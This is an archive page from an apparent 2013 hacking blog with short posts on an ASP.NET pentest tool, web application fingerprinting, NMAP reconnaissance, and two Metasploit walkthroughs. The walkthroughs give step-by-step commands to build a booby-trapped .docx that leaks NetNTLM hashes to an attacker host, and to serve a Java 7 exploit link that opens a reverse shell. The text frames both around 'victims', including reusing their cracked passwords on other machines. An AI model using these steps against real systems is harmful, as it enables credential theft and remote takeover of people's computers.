Sunday, March 24, 2013

ASP.NET web-application Testing

0 comments
Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.

You can Download source code from following website.

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:
(1)Viewstate eavesdroping & information disclosure

(2)Session Fixation

(3)Oracle Padding


Tuesday, March 19, 2013

Web-application Fingerprinting

0 comments


Methods of Web Application Finger Printing

Historically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards identification of web application running on remote machine.

HTML Data Inspection

This is the simplest method in which manual approach is to open the site on browser and look at its source code, similarly on automated manner your tool will connect to site, download the page and then will run some basic regular expression patterns which can give you the results in yes or no. Basically what we are looking for is unique pattern specific to web software. Examples of such patterns are

1) Wordpress
Meta Tag Folder Names
Web-application-Fingerprinting-1

Folder Names in Link section
Web-application-Fingerprinting-2

Ever green notice at the bottom
Web-application-Fingerprinting-3

2) OWA
URL pattern
http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/
Web-application-Fingerprinting-4

Friday, March 8, 2013

Microsoft Word UNC Path Injector

1 comments
This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

First Hack the Victim PC Using Metaspolit (click here)

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password

Sunday, March 3, 2013

Hack Remote P.C. using latest java vulnerability

0 comments
JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

Open your terminal & type following code

msfconsole
use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/
Send link to victim. As soon as he clicked you got session. Type following command.

Sessions -l
sessions -i 1

Now you get victim `s shell.

Friday, March 1, 2013

Use NMAP as a Information gathering tool

0 comments
Usually we use NMAP as a port scanner to find open port of web-server, But with help of this Tool we can also gather Information about victim using NMAP script. In this tutorial we use NMAP to gather information.

(1) Use NMAP to determine I.P. Address of victim:- NMAP include two scripts in his database.
nmap --script ip-geolocation-* host-name
nmap-as-information-gather

As we can see that it show co-ordinate & location of our target.

(2)Use NMAP as Whois Tool:- Following Command is used to find whois information about victim
nmap --script whois host-name
nmap-as-information-gather


UA-35960349-1